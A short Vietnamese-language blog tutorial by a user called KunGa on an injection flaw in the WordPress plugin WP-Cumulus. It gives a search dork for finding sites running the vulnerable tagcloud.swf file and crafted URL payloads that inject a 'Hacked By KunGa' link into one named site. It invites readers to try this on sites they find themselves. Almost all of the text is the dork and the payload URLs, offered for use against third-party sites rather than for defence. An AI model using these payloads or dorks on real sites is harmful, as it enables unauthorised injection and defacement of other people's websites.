Xin chào,mình là KunGa,lâu rồi không cập nhật blog nên viết 1 tut về xss ở plugin WP-Cumulus
dork:
http://e4god.com/wordpress/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href%3D%27https%3A%2F%2Fkunga96.blogspot.com%2Findex%27+style%3D%27font-size%3A+40pt%27%3EHacked+By+KunGa%3C%2Fa%3E%3C%2Ftags%3E
các bạn tự kiểm nha nhé
dork:
inurl:wp-content/plugins/wp-cumulus/tagcloud.swfví dụ mình tìm ra 1 site như sau:http://e4god.com/wordpress/wp-content/plugins/wp-cumulus/tagcloud.swfmình thay vào đoạn này:tagcloud.swf?mode=tags&tagcloud=<tags><a+href%3D'https%3A%2F%2Fwww.facebook.com%2Findonesian.go.id'+style%3D'font-size%3A+40pt'>Hacked+By+KunGa<%2Fa><%2Ftags> sẽ có link như sau:http://e4god.com/wordpress/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href%3D%27https%3A%2F%2Fkunga96.blogspot.com%2Findex%27+style%3D%27font-size%3A+40pt%27%3EHacked+By+KunGa%3C%2Fa%3E%3C%2Ftags%3Ehttp://e4god.com/wordpress/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href%3D%27https%3A%2F%2Fkunga96.blogspot.com%2Findex%27+style%3D%27font-size%3A+40pt%27%3EHacked+By+KunGa%3C%2Fa%3E%3C%2Ftags%3E
các bạn tự kiểm nha nhé